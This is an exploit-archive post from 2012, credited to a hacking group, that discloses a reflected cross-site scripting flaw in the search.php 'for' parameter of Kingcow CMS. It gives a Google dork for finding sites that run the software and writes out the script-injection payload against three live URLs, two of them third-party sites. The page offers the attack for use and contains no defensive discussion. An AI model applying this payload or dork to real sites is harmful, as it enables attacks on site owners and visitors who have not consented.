Home / exploits Kingcow CMS Cross Site Scripting
Posted on 05 September 2012
<!-- ________ .__ __________________ \_ ___ \_______|__| _____ \_____ \______ / /\_ __ |/ _(__ <| _/ \____| | / | Y Y / | \______ /|__| |__|__|_| /______ /____|_ / / / / / M3Mb3R OF AjaxTm --> # Exploit Title: kingcow CMS Cross site Scripting Vulnerability # # Google Dork: Intext:"Powered by Central" # # Date: 09/04/2012 # # Author: Crim3R & Ajax Security Team # # Home : Http://WwW.AjaxTm.com/ # # Vendor Home : http://kingcow.com/ # # Tested on: all # ================================== [+] for parametr in search.php is Vulnerable to xss D3m0: http://pm.umd.edu/search.php?for="><script>alert(0);</script>&search_submit=Search http://progressivemaryland.org/search.php?for="><script>alert(0);</script>&search_submit=Search http://kingcow.com//search.php?for="><script>alert(0);</script>&search_submit=Search ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369
